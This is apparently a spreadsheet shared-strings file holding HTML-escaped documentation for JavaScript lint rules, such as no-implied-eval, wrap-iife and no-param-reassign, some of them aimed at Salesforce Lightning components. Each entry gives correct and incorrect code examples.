    <t>&lt;p&gt;The &lt;code&gt;Object&lt;/code&gt; constructor is used to create new generic objects in JavaScript, such as:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var myObject = new Object();\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;However, this is no different from using the more concise object literal syntax:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var myObject = {};\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;For this reason, many prefer to always use the object literal syntax and never use the &lt;code&gt;Object&lt;/code&gt; constructor.&lt;/p&gt;\n&lt;p&gt;While there are no performance differences between the two approaches, the byte savings and conciseness of the object literal form is what has made it the de facto way of creating new objects.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows &lt;code&gt;Object&lt;/code&gt; constructors.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-new-object: "error"*/\n\nvar myObject = new Object();\n\nvar myObject = new Object;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-new-object: "error"*/\n\nvar myObject = new CustomObject();\n\nvar myObject = {};\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you wish to allow the use of the &lt;code&gt;Object&lt;/code&gt; constructor, you can safely turn this rule off.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-div-regex</t>
  </si>
  <si>
    <t>disallow division operators explicitly at the beginning of regular expressions</t>
  </si>
  <si>
    <t>&lt;p&gt;Require regex literals to escape division operators.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;function bar() { return /=foo/; }\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This is used to disambiguate the division operator to not confuse users. Without an escape character users may think that the regular expression is a division expression.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-div-regex: "error"*/\n\nfunction bar() { return /=foo/; }\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-div-regex: "error"*/\n\nfunction bar() { return /\=foo/; }\n&lt;/code&gt;&lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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numbers:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var num = .5;\nvar num = 2.;\nvar num = -.7;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Although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number.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule is aimed at eliminating floating decimal points and will warn whenever a numeric value has a decimal point but is missing a number either before or after it.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-floating-decimal: "error"*/\n\nvar num = .5;\nvar num = 2.;\nvar num = -.7;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-floating-decimal: "error"*/\n\nvar num = 0.5;\nvar num = 2.0;\nvar num = -0.7;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you aren't concerned about misinterpreting floating decimal point values, then you can safely turn this rule off.&lt;/p&gt;\n&lt;h2 id="compatibility"&gt;Compatibility&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;strong&gt;JSHint&lt;/strong&gt;: W008&lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:ecma-intrinsics</t>
  </si>
  <si>
    <t>validate javascript APIs</t>
  </si>
  <si>
    <t>&lt;p&gt;This rule makes sure that intrinsic Javascript APIs are used according to the documentation. It disallows deprecated, non-standard and removed features.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;Intrinsic APIs are those found in the &lt;a href="https://tc39.github.io/ecma262/"&gt;ECMAScript Language Specification&lt;/a&gt;.&lt;/p&gt;\n&lt;p&gt;When the rule is enabled, unsupported calls or API objects are disallowed.  Your Lightning components are permitted to use:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;Standard Lightning Component Framework features.&lt;/li&gt;\n&lt;li&gt;Standard Javascript features.&lt;/li&gt;\n&lt;li&gt;Standard Locker Service SecureObject object features. &lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;String.doSomething = function(){}  //This is a violation, the intrinsic type String is modified.\n&lt;/code&gt;&lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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declaration.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;// function expression could be unwrapped\nvar x = function () { return { y: 1 };}();\n\n// function declaration must be wrapped\nfunction () { /* side effects */ }(); // SyntaxError\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule requires all immediately-invoked function expressions to be wrapped in parentheses.&lt;/p&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;p&gt;This rule has two options, a string option and an object option.&lt;/p&gt;\n&lt;p&gt;String option:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;"outside"&lt;/code&gt; enforces always wrapping the &lt;em&gt;call&lt;/em&gt; expression. The default is &lt;code&gt;"outside"&lt;/code&gt;.&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;"inside"&lt;/code&gt; enforces always wrapping the &lt;em&gt;function&lt;/em&gt; expression.&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;"any"&lt;/code&gt; enforces always wrapping, but allows either style.&lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;Object option:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;"functionPrototypeMethods": true&lt;/code&gt; additionally enforces wrapping function expressions invoked using &lt;code&gt;.call&lt;/code&gt; and &lt;code&gt;.apply&lt;/code&gt;. The default is &lt;code&gt;false&lt;/code&gt;.&lt;/li&gt;\n&lt;/ul&gt;\n&lt;h3 id="outside"&gt;outside&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the default &lt;code&gt;"outside"&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint wrap-iife: ["error", "outside"]*/\n\nvar x = function () { return { y: 1 };}(); // unwrapped\nvar x = (function () { return { y: 1 };})(); // wrapped function expression\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the default &lt;code&gt;"outside"&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint wrap-iife: ["error", "outside"]*/\n\nvar x = (function () { return { y: 1 };}()); // wrapped call expression\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="inside"&gt;inside&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;"inside"&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint wrap-iife: ["error", "inside"]*/\n\nvar x = function () { return { y: 1 };}(); // unwrapped\nvar x = (function () { return { y: 1 };}()); // wrapped call expression\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;"inside"&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint wrap-iife: ["error", "inside"]*/\n\nvar x = (function () { return { y: 1 };})(); // wrapped function expression\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="any"&gt;any&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;"any"&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint wrap-iife: ["error", "any"]*/\n\nvar x = function () { return { y: 1 };}(); // unwrapped\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;"any"&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint wrap-iife: ["error", "any"]*/\n\nvar x = (function () { return { y: 1 };}()); // wrapped call expression\nvar x = (function () { return { y: 1 };})(); // wrapped function expression\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="functionprototypemethods"&gt;functionPrototypeMethods&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule with the &lt;code&gt;"inside", { "functionPrototypeMethods": true }&lt;/code&gt; options:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/* eslint wrap-iife: [2, "inside", { functionPrototypeMethods: true }] */\n\nvar x = function(){ foo(); }()\nvar x = (function(){ foo(); }())\nvar x = function(){ foo(); }.call(bar)\nvar x = (function(){ foo(); }.call(bar))\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the &lt;code&gt;"inside", { "functionPrototypeMethods": true }&lt;/code&gt; options:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/* eslint wrap-iife: [2, "inside", { functionPrototypeMethods: true }] */\n\nvar x = (function(){ foo(); })()\nvar x = (function(){ foo(); }).call(bar)\n&lt;/code&gt;&lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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concerns.&lt;/p&gt;\n&lt;p&gt;The first is using &lt;code&gt;setTimeout()&lt;/code&gt;, &lt;code&gt;setInterval()&lt;/code&gt; or &lt;code&gt;execScript()&lt;/code&gt; (Internet Explorer only), both of which can accept a string of JavaScript code as their first argument. For example:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;setTimeout("alert('Hi!');", 100);\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;This is considered an implied &lt;code&gt;eval()&lt;/code&gt; because a string of JavaScript code is\n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performant:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;setTimeout(function() {\n    alert("Hi!");\n}, 100);\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;The best practice is to always use a function for the first argument of &lt;code&gt;setTimeout()&lt;/code&gt; and &lt;code&gt;setInterval()&lt;/code&gt; (and avoid &lt;code&gt;execScript()&lt;/code&gt;).&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule aims to eliminate implied &lt;code&gt;eval()&lt;/code&gt; through the use of &lt;code&gt;setTimeout()&lt;/code&gt;, &lt;code&gt;setInterval()&lt;/code&gt; or &lt;code&gt;execScript()&lt;/code&gt;. As such, it will warn when either function is used with a string as the first argument.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-implied-eval: "error"*/\n\nsetTimeout("alert('Hi!');", 100);\n\nsetInterval("alert('Hi!');", 100);\n\nexecScript("alert('Hi!')");\n\nwindow.setTimeout("count = 5", 10);\n\nwindow.setInterval("foo = bar", 10);\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-implied-eval: "error"*/\n\nsetTimeout(function() {\n    alert("Hi!");\n}, 100);\n\nsetInterval(function() {\n    alert("Hi!");\n}, 100);\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you want to allow &lt;code&gt;setTimeout()&lt;/code&gt; and &lt;code&gt;setInterval()&lt;/code&gt; with string arguments, then you can safely disable this rule.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-param-reassign</t>
  </si>
  <si>
    <t>disallow reassigning `function` parameters</t>
  </si>
  <si>
    <t>&lt;h1 id="disallowreassignmentoffunctionparametersnoparamreassign"&gt;Disallow Reassignment of Function Parameters (no-param-reassign)&lt;/h1&gt;\n&lt;p&gt;Assignment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error.&lt;/p&gt;\n&lt;p&gt;This rule can be also configured to fail when function parameters are modified. Side effects on parameters can cause counter-intuitive execution flow and make errors difficult to track down.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule aims to prevent unintended behavior caused by modification or reassignment of function parameters.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-param-reassign: "error"*/\n\nfunction foo(bar) {\n    bar = 13;\n}\n\nfunction foo(bar) {\n    bar++;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-param-reassign: "error"*/\n\nfunction foo(bar) {\n    var baz = bar;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;p&gt;This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default.&lt;/p&gt;\n&lt;h3 id="props"&gt;props&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the default &lt;code&gt;{ "props": false }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-param-reassign: ["error", { "props": false }]*/\n\nfunction foo(bar) {\n    bar.prop = "value";\n}\n\nfunction foo(bar) {\n    delete bar.aaa;\n}\n\nfunction foo(bar) {\n    bar.aaa++;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;{ "props": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-param-reassign: ["error", { "props": true }]*/\n\nfunction foo(bar) {\n    bar.prop = "value";\n}\n\nfunction foo(bar) {\n    delete bar.aaa;\n}\n\nfunction foo(bar) {\n    bar.aaa++;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;{ "props": true }&lt;/code&gt; option with &lt;code&gt;"ignorePropertyModificationsFor"&lt;/code&gt; set:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-param-reassign: ["error", { "props": true, "ignorePropertyModificationsFor": ["bar"] }]*/\n\nfunction foo(bar) {\n    bar.prop = "value";\n}\n\nfunction foo(bar) {\n    delete bar.aaa;\n}\n\nfunction foo(bar) {\n    bar.aaa++;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you want to allow assignment to function parameters, then you can safely disable this rule.&lt;/p&gt;\n&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;a href="https://spin.atomicobject.com/2011/04/10/javascript-don-t-reassign-your-function-arguments/"&gt;JavaScript: Don’t Reassign Your Function Arguments&lt;/a&gt;&lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:secure-document</t>
  </si>
  <si>
    <t>validate document global access</t>
  </si>
  <si>
    <t>&lt;p&gt;This rule makes sure that only supported properties and functions are used to access the document global.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;When the rule is enabled, unsupported calls or API objects are disallowed.  Your Lightning components are permitted to use:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;Standard Lightning Component Framework features.&lt;/li&gt;\n&lt;li&gt;Standard Javascript features.&lt;/li&gt;\n&lt;li&gt;Standard Locker Service SecureObject object features. &lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;All disallowed uses are shown in red on this &lt;a href="http://documentation.auraframework.org/lockerApiTest/index.app?aura.mode=DEV"&gt;Document vs SecureDocument Compatibility Table&lt;/a&gt;.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var curScriptElement = document.currentScript; //Using document.currentScript is disallowed.\n&lt;/code&gt;&lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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as:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var text = "Hello world".substring(2);\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Behind the scenes in this example, a &lt;code&gt;String&lt;/code&gt; object is constructed. The &lt;code&gt;substring()&lt;/code&gt; method exists on &lt;code&gt;String.prototype&lt;/code&gt; and so is accessible to the string instance.&lt;/p&gt;\n&lt;p&gt;It's also possible to manually create a new wrapper instance:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var stringObject = new String("Hello world");\nvar numberObject = new Number(33);\nvar booleanObject = new Boolean(false);\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Although possible, there aren't any good reasons to use these primitive wrappers as constructors. They tend to confuse other developers more than anything else because they seem like they should act as primitives, but they do not. For example:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var stringObject = new String("Hello world");\nconsole.log(typeof stringObject);       // "object"\n\nvar text = "Hello world";\nconsole.log(typeof text);               // "string"\n\nvar booleanObject = new Boolean(false);\nif (booleanObject) {    // all objects are truthy!\n    console.log("This executes");\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;The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&lt;code&gt;false&lt;/code&gt;.&lt;/p&gt;\n&lt;p&gt;For these reasons, it's considered a best practice to avoid using primitive wrapper types with &lt;code&gt;new&lt;/code&gt;.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule aims to eliminate the use of &lt;code&gt;String&lt;/code&gt;, &lt;code&gt;Number&lt;/code&gt;, and &lt;code&gt;Boolean&lt;/code&gt; with the &lt;code&gt;new&lt;/code&gt; operator. As such, it warns whenever it sees &lt;code&gt;new String&lt;/code&gt;, &lt;code&gt;new Number&lt;/code&gt;, or &lt;code&gt;new Boolean&lt;/code&gt;.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-new-wrappers: "error"*/\n\nvar stringObject = new String("Hello world");\nvar numberObject = new Number(33);\nvar booleanObject = new Boolean(false);\n\nvar stringObject = new String;\nvar numberObject = new Number;\nvar booleanObject = new Boolean;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-new-wrappers: "error"*/\n\nvar text = String(someValue);\nvar num = Number(someValue);\n\nvar object = new MyString();\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you want to allow the use of primitive wrapper objects, then you can safely disable this rule.&lt;/p&gt;\n&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;a href="https://www.inkling.com/read/javascript-definitive-guide-david-flanagan-6th/chapter-3/wrapper-objects"&gt;Wrapper objects&lt;/a&gt;&lt;/li&gt;\n&lt;/ul&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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example:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;function doSomething() {\n    return foo = bar + 2;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;It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error.&lt;/p&gt;\n&lt;p&gt;Because of this ambiguity, it's considered a best practice to not use assignment in &lt;code&gt;return&lt;/code&gt; statements.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule aims to eliminate assignments from &lt;code&gt;return&lt;/code&gt; statements. As such, it will warn whenever an assignment is found as part of &lt;code&gt;return&lt;/code&gt;.&lt;/p&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;p&gt;The rule takes one option, a string, which must contain one of the following values:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;except-parens&lt;/code&gt; (default): Disallow assignments unless they are enclosed in parentheses.&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;always&lt;/code&gt;: Disallow all assignments.&lt;/li&gt;\n&lt;/ul&gt;\n&lt;h3 id="exceptparens"&gt;except-parens&lt;/h3&gt;\n&lt;p&gt;This is the default option.\nIt disallows assignments unless they are enclosed in parentheses.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the default &lt;code&gt;"except-parens"&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-return-assign: "error"*/\n\nfunction doSomething() {\n    return foo = bar + 2;\n}\n\nfunction doSomething() {\n    return foo += 2;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the default &lt;code&gt;"except-parens"&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-return-assign: "error"*/\n\nfunction doSomething() {\n    return foo == bar + 2;\n}\n\nfunction doSomething() {\n    return foo === bar + 2;\n}\n\nfunction doSomething() {\n    return (foo = bar + 2);\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="always"&gt;always&lt;/h3&gt;\n&lt;p&gt;This option disallows all assignments in &lt;code&gt;return&lt;/code&gt; statements.\nAll assignments are treated as problems.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;"always"&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-return-assign: ["error", "always"]*/\n\nfunction doSomething() {\n    return foo = bar + 2;\n}\n\nfunction doSomething() {\n    return foo += 2;\n}\n\nfunction doSomething() {\n    return (foo = bar + 2);\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;"always"&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-return-assign: ["error", "always"]*/\n\nfunction doSomething() {\n    return foo == bar + 2;\n}\n\nfunction doSomething() {\n    return foo === bar + 2;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you want to allow the use of assignment operators in a &lt;code&gt;return&lt;/code&gt; statement, then you can safely disable this rule.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-self-compare</t>
  </si>
  <si>
    <t>disallow comparisons where both sides are exactly the same</t>
  </si>
  <si>
    <t>&lt;p&gt;Comparing a variable against itself is usually an error, either a typo or refactoring error. It is confusing to the reader and may potentially introduce a runtime error.&lt;/p&gt;\n&lt;p&gt;The only time you would compare a variable against itself is when you are testing for &lt;code&gt;NaN&lt;/code&gt;. However, it is far more appropriate to use &lt;code&gt;typeof x === 'number' &amp;&amp; isNaN(x)&lt;/code&gt; or the &lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Number/isNaN"&gt;Number.isNaN ES2015 function&lt;/a&gt; for that use case rather than leaving the reader of the code to determine the intent of self comparison.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This error is raised to highlight a potentially confusing and potentially pointless piece of code. There are almost no situations in which you would need to compare something to itself.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-self-compare: "error"*/\n\nvar x = 10;\nif (x === x) {\n    x = 20;\n}\n&lt;/code&gt;&lt;/pre&gt;</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</si>
  <si>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</si>
  <si>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</si>
  <si>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as:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var re = /foo   bar/;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;In this regular expression, it's very hard to tell how many spaces are intended to be matched. It's better to use only one space and then specify how many spaces are expected, such as:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var re = /foo {3}bar/;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Now it is very clear that three spaces are expected to be matched.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows multiple spaces in regular expression literals.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-regex-spaces: "error"*/\n\nvar re = /foo   bar/;\nvar re = new RegExp("foo   bar");\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-regex-spaces: "error"*/\n\nvar re = /foo {3}bar/;\nvar re = new RegExp("foo {3}bar");\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you want to allow multiple spaces in a regular expression, then you can safely turn this rule off.&lt;/p&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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issue.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;function foo() {}\nfoo = bar;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows reassigning &lt;code&gt;function&lt;/code&gt; declarations.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-func-assign: "error"*/\n\nfunction foo() {}\nfoo = bar;\n\nfunction foo() {\n    foo = bar;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule, unlike the corresponding rule in JSHint:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-func-assign: "error"*/\n\nfoo = bar;\nfunction foo() {}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-func-assign: "error"*/\n\nvar foo = function () {}\nfoo = bar;\n\nfunction foo(foo) { // `foo` is shadowed.\n    foo = bar;\n}\n\nfunction foo() {\n    var foo = bar;  // `foo` is shadowed.\n}\n&lt;/code&gt;&lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
